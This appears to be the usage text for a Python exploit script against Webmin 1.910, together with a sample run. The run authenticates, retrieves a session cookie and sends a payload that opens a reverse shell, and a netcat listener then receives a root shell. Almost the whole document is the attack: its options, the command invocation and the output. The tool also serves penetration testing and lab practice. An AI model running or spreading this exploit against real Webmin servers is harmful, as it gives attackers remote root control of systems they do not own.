usage: webmin_exploit.py [-h] --rhost RHOST [--rport RPORT] --lhost LHOST
                         [--lport LPORT] [-u USER] -p PASSWORD [-t TARGETURI]
                         [-s SSL]

Webmin 1.910 - Remote Code Execution using, python3 script

optional arguments:
  -h, --help            show this help message and exit
  --rhost RHOST         Ip address of the webmin server
  --rport RPORT         target webmin port, default 10000
  --lhost LHOST         Local ip address to listen for the reverse shell
  --lport LPORT         The Bind port for the reverse shell Default is 4444
  -u USER, --user USER  The username to use for authentication By default is
                        admin
  -p PASSWORD, --password PASSWORD
                        The password to use for authentication
  -t TARGETURI, --TARGETURI TARGETURI
                        Base path for Webmin application. By default set to
                        "/"
  -s SSL, --SSL SSL     Negotiate SSL/TLS for outgoing connections. By default
                        ssl is set to False

$ python webmin_exploit.py --rhost 10.x.x.x --lhost 127.0.0.1 -p admin -u admin -s True --lport 9001
****************************** Webmin 1.910 Exploit By roughiz*******************************
*********************************Update Surgat***********************************************
*********************************************************************************************
*********************************************************************************************
****************************** Retrieve Cookies sid *****************************************
********** [+] [Exploit] The Cookie is b41b644a221d6d7b14d4b5e23012dddd
********************************************************************************************
****************************** Create payload and Exploit ***********************************
********** [+] [Exploit] Verify you nc listener on port 9001 for the incomming reverse shell

$ nc -lvp 9001
Listening on [0.0.0.0] (family 0, port 9001)
Connection from 10.x.x.x 39126 received!
id
uid=0(root) gid=0(root) groups=0(root)